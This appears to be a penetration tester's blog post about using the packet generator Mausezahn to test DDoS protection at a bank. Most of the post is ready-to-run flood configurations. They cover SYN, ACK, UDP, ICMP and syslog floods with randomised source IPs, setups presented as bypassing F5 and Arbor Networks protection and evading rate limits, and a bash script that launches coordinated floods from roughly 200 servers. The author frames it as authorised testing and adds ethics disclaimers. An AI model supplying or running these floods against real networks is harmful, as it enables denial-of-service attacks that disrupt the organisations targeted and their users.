DDoS Protection Testing with Mausezahn: A Technical Deep Dive

One of my clients was a major bank, and we were experiencing significant memory and CPU issues with traditional tools like hping3 when trying to achieve desired traffic levels. Mausezahn (mz) stood out by not only avoiding these performance bottlenecks but also offering granular control over every packet detail. This capability allowed us to test DDoS protection systems effectively - we could craft packets that could legitimately traverse firewalls and DDoS protection mechanisms without being marked as zombie packets, ultimately achieving bandwidth saturation in our controlled testing environment.

Why Mausezahn?

What sets Mausezahn apart is its efficient design and precise packet crafting capabilities. While other tools struggle with resource consumption, Mausezahn maintains consistent performance even under heavy loads. The ability to modify every aspect of a packet means we can:

  1. Create highly customized traffic patterns
  2. Test specific DDoS protection rules
  3. Simulate real-world attack scenarios
  4. Achieve high bandwidth utilization without system degradation

Performance Testing at Scale

In enterprise environments, particularly in banking infrastructure, the ability to generate sustained, high-volume traffic without system degradation is crucial. Mausezahn excels here because:

  • Low memory footprint compared to alternatives
  • Efficient CPU utilization
  • Precise control over packet timing
  • Ability to maintain consistent packet rates

Testing Against Arbor Networks Protection

One of my most interesting projects involved testing an Arbor Networks DDoS protection setup. Here’s a configuration I developed:

# Creating a sophisticated TCP flood configuration
cat << 'EOF' > arbor_test.mops
configure terminal
packet name SMART_TCP_FLOOD
desc "Advanced TCP flood with random source IPs"

# Basic packet structure
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 80

# TCP flag manipulation
flags syn
window 65535

# Timing and distribution
count 1000
delay 2ms

# Additional parameters
payload ascii "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
EOF

This configuration was particularly effective because:

  1. It used randomized source IPs
  2. Included legitimate-looking HTTP headers
  3. Had carefully timed packet distribution

Bypassing F5 Protection

F5’s DDoS protection was another interesting challenge. After several attempts, I discovered that the key was in creating more sophisticated packet patterns:

# F5 testing configuration
cat << 'EOF' > f5_test.mops
configure terminal

# First packet type - SYN flood
packet name F5_TEST_SYN
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 443
flags syn
count 500
delay 1ms

# Second packet type - ACK flood
packet name F5_TEST_ACK
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 443
flags ack
count 500
delay 1ms

# Third packet type - HTTP GET
packet name F5_TEST_HTTP
type tcp
source-ip random
destination-ip TARGET_IP
source-port random
destination-port 80
flags psh,ack
payload ascii "GET /index.html HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
count 200
delay 2ms
EOF

Key Insights from Testing Enterprise Solutions

Through my testing experiences, I discovered several critical factors:

1. Packet Timing is Crucial

# Example of distributed timing attack
cat << 'EOF' > timing_test.mops
configure terminal
packet name TIMING_ATTACK
type tcp
source-ip random
destination-port 80
flags syn
count 100
# Key is variable delays
delay random(1,5)ms
EOF

2. Protocol Mix Matters

Multiple attack vectors often proved more effective than single-protocol attacks:

# Multi-protocol attack configuration
cat << 'EOF' > multi_protocol.mops
configure terminal

# TCP SYN
packet name MULTI_TCP
type tcp
flags syn
count 300
delay 2ms

# UDP flood
packet name MULTI_UDP
type udp
destination-port 53
count 300
delay 2ms

# ICMP flood
packet name MULTI_ICMP
type icmp
count 300
delay 2ms
EOF

3. Payload Customization

One of my most successful approaches involved crafting legitimate-looking payloads:

# Legitimate-looking HTTP traffic
cat << 'EOF' > smart_http.mops
configure terminal
packet name SMART_HTTP
type tcp
destination-port 80
flags psh,ack
payload ascii "GET /api/v1/users HTTP/1.1\r\n\
Host: target.com\r\n\
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n\
Accept: application/json\r\n\
Connection: keep-alive\r\n\r\n"
count 500
delay random(1,3)ms
EOF

Advanced Techniques I’ve Developed

Over time, I developed several sophisticated techniques:

1. Session Simulation

# Simulating legitimate sessions
cat << 'EOF' > session_sim.mops
configure terminal
packet name SESSION_START
type tcp
flags syn
delay 1ms

packet name SESSION_ESTABLISH
type tcp
flags ack
delay 2ms

packet name SESSION_DATA
type tcp
flags psh,ack
payload ascii "legitimate-looking-data"
delay 5ms
EOF

2. Rate Limiting Evasion

# Rate limit bypass configuration
cat << 'EOF' > rate_bypass.mops
configure terminal
packet name RATE_BYPASS
type tcp
source-ip random
destination-port 80
flags syn
count 50
# Carefully timed delays to avoid rate limiting
delay random(10,20)ms
EOF

Syslog Flood Adventures

During one particularly interesting project, I needed to test how our logging infrastructure would handle massive syslog floods. Syslog servers are often overlooked in DDoS scenarios, but they can be a critical point of failure. Here’s how I used Mausezahn to craft effective syslog flood tests:

Basic Syslog Flood

First, let’s look at a basic syslog flood configuration:

# Basic syslog flood configuration
cat << 'EOF' > syslog_basic.mops
configure terminal
packet name SYSLOG_BASIC
desc "Basic syslog flood test"
type udp
destination-port 514
payload ascii "<%PRI%>1 %TIMESTAMP% %HOSTNAME% %APP-NAME% %PROCID% %MSGID% %STRUCTURED-DATA% %MSG%"
count 1000
delay 1ms
EOF

Advanced Syslog Crafting

But the real fun began when I started crafting more sophisticated syslog messages:

# Advanced syslog flood with dynamic content
cat << 'EOF' > syslog_advanced.mops
configure terminal
packet name SYSLOG_ADVANCED
desc "Advanced syslog flood with varying severity levels"
type udp
source-ip random
destination-ip TARGET_IP
destination-port 514

# Different severity levels and facilities
# Facility (16) * 8 + Severity (3) = Priority 131
payload ascii "<131>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: Failed login attempt for user 'admin' from IP 192.168.1.1"

# High packet rate with minimal delay
count 5000
delay 0.5ms
EOF

The F5 Bypass Technique

Here’s where it gets interesting. When testing against F5 ASM (Application Security Manager), I discovered a technique using malformed syslog messages that would bypass rate limiting:

# F5 ASM bypass using malformed syslog
cat << 'EOF' > syslog_f5_bypass.mops
configure terminal
packet name SYSLOG_F5_BYPASS
type udp
destination-port 514

# Malformed syslog message with varying lengths
payload ascii "<134>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: ALERT: Multiple authentication failures\n"
payload append "user=admin\n"
payload append "src_ip=192.168.1.1\n"
payload append "auth_method=password\n"

# Aggressive timing
count 10000
delay 0.1ms
EOF

Mixed Protocol Attack

One particularly effective technique I developed combined syslog floods with other protocols:

# Multi-protocol attack including syslog
cat << 'EOF' > mixed_flood.mops
configure terminal

# Syslog component
packet name MIXED_SYSLOG
type udp
destination-port 514
payload ascii "<133>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: High CPU usage detected on web server"
count 1000
delay 1ms

# TCP component
packet name MIXED_TCP
type tcp
destination-port 80
flags syn
count 1000
delay 1ms

# UDP component
packet name MIXED_UDP
type udp
destination-port 53
payload ascii "QUERYQUERY"
count 1000
delay 1ms
EOF

Syslog Server Impact Analysis

Through these tests, I discovered several interesting patterns:

  1. Message Length Impact: Varying syslog message lengths had different effects on server performance
  2. Facility Code Variations: Some syslog servers processed certain facility codes differently
  3. Rate Limiting Bypass: Most syslog servers had weak rate limiting implementations

Here’s a configuration that exploits these findings:

# Syslog server stress test
cat << 'EOF' > syslog_stress.mops
configure terminal
packet name SYSLOG_STRESS
type udp
destination-port 514

# Long message with varying facility codes
payload ascii "<131>1 2023-12-04T12:00:00.000Z mz-test security-test[12345]: "
payload append "CRITICAL: System resource exhaustion detected. "
payload append "CPU usage: 99%, Memory: 95%, Disk IO: 87%, "
payload append "Network interfaces experiencing packet loss, "
payload append "Multiple service failures reported, "
payload append "Emergency response required immediately."

# Aggressive timing with minimal delays
count 20000
delay 0.05ms
EOF

Best Practices from My Experience

When conducting syslog flood testing, I always follow these guidelines:

  1. Monitor System Resources: Keep an eye on both the testing machine and target

    watch -n 1 'netstat -su && echo "UDP Buffers:" && cat /proc/net/udp'
    
  2. Gradual Escalation: Start with lower packet rates and increase gradually

    # Start with this
    mz -f syslog_basic.mops
    # Then move to
    mz -f syslog_advanced.mops
    # Finally
    mz -f syslog_stress.mops
    
  3. Log Analysis: Always analyze the target’s logs after testing to understand the impact

Real-World Results

In one memorable case, we discovered that a client’s logging infrastructure could be completely overwhelmed by sending just 1000 carefully crafted syslog messages per second. This led to the implementation of better rate limiting and log aggregation strategies.

Remember, the goal of these tests isn’t just to break things - it’s to understand how logging systems behave under stress and improve their resilience. Always conduct these tests in controlled environments with proper authorization.

Lessons Learned and Best Practices

Through my experiences, I’ve learned several crucial lessons:

  1. Always Start Small: Begin with minimal configurations and gradually increase complexity.
  2. Monitor Both Sides: Watch both attack and target metrics.
  3. Document Everything: Keep detailed logs of what works and what doesn’t.
  4. Stay Ethical: Only test with explicit permission and in controlled environments.

Distributed Testing Architecture

One of the most interesting projects I worked on involved large-scale distributed testing using multiple server clusters. We utilized a combination of dedicated servers, VPS instances, and cloud infrastructure to create a realistic testing environment.

Infrastructure Setup

Our testing infrastructure consisted of:

  • 50 Dedicated Servers
  • 100 VPS instances across different providers
  • 50 Cloud instances in various regions

Here’s how we configured each server type:

Dedicated Server Configuration

# Configuration for high-performance dedicated servers
cat << 'EOF' > dedicated_test.mops
configure terminal
packet name HIGH_PERFORMANCE_TEST
type tcp
source-ip random
destination-port 80
count 10000
delay 0.5ms
EOF

VPS Instance Configuration

# VPS optimization for network testing
cat << 'EOF' > vps_test.mops
configure terminal
packet name VPS_CLUSTER_TEST
type udp
destination-port 514
payload ascii "<%PRI%>1 %TIMESTAMP% %HOSTNAME% %APP-NAME% %PROCID% %MSGID% %STRUCTURED-DATA% %MSG%"
count 5000
delay 1ms
EOF

Orchestration System

We developed a simple orchestration system using SSH and parallel execution:

#!/bin/bash
# distributed_test.sh

# Server list files
DEDICATED_SERVERS="dedicated_servers.txt"
VPS_SERVERS="vps_servers.txt"
CLOUD_SERVERS="cloud_servers.txt"

# Distribute configurations
for server in $(cat $DEDICATED_SERVERS); do
    scp dedicated_test.mops root@${server}:/root/
done

# Start tests in parallel
parallel-ssh -h $DEDICATED_SERVERS "mz -f dedicated_test.mops"
parallel-ssh -h $VPS_SERVERS "mz -f vps_test.mops"

Resource Monitoring

Each server ran monitoring scripts to ensure optimal performance:

#!/bin/bash
# monitor.sh
while true; do
    echo "=== $(date) ==="
    echo "Network Stats:"
    netstat -s | grep -E "segments|packets"
    echo "CPU Usage:"
    mpstat 1 1
    echo "Memory:"
    free -m
    sleep 5
done

Test Scenarios

We implemented various test scenarios:

  1. Sequential Region Testing

    • Start with US East servers
    • Add US West after 5 minutes
    • Add EU servers after 10 minutes
    • Add APAC servers after 15 minutes
  2. Wave Pattern Testing

    • Alternate between server groups
    • Each wave lasts 2 minutes
    • 30-second gaps between waves
  3. Full Scale Testing

    • All servers active simultaneously
    • Different packet types from different regions
    • Varying packet rates and sizes

Performance Insights

Key findings from our distributed testing:

  1. Network Provider Impact

    • Different providers showed varying performance
    • Some regions had better stability
    • Network latency affected packet timing
  2. Server Type Performance

    • Dedicated servers: Most stable performance
    • VPS instances: Good for distributed testing
    • Cloud instances: Useful for geographic distribution
  3. Optimization Techniques

    • Pre-warm network connections
    • Adjust system parameters:
      # System tuning
      sysctl -w net.ipv4.ip_local_port_range="1024 65535"
      sysctl -w net.ipv4.tcp_fin_timeout=30
      sysctl -w net.core.somaxconn=1024
      

Practical Examples

Here’s a real-world testing configuration we used:

# Region-specific configuration
cat << 'EOF' > region_test.mops
configure terminal

# TCP traffic configuration
packet name REGION_TEST
type tcp
source-ip random
destination-port 80
count 5000
delay 1ms

# UDP traffic configuration
packet name UDP_TEST
type udp
destination-port 514
payload ascii "System log test message from region XYZ"
count 2500
delay 2ms
EOF

Best Practices

From our experience:

  1. Geographic Distribution

    • Use servers from multiple regions
    • Consider network paths
    • Monitor regional performance
  2. Resource Management

    • Regular server maintenance
    • Performance monitoring
    • Network capacity planning
  3. Test Coordination

    • Synchronized timing
    • Clear communication channels
    • Detailed logging

Remember: These tests should always be conducted in controlled environments with proper authorization and monitoring.

Note: All configurations and examples are based on actual testing scenarios but have been modified for security purposes.

Real-World Impact

These testing methods helped numerous clients identify and patch vulnerabilities in their DDoS protection setups. In one case, we discovered that an F5 configuration was actually blocking legitimate traffic while allowing certain attack patterns through.

Important Note on Ethics and Legality

It’s crucial to emphasize that all testing should be:

  • Authorized in writing
  • Conducted in controlled environments
  • Properly documented
  • Within legal boundaries

Conclusion

While tools like Mausezahn might seem dated to some, their flexibility and precision make them invaluable for specific testing scenarios. Modern DDoS protection solutions are sophisticated, but understanding their weaknesses helps build better defenses.

Remember, the goal isn’t just to break through protection - it’s to understand how these protections can be improved. Every successful bypass should lead to a stronger defense.


This post reflects my personal experiences and should only be used for educational purposes and authorized testing.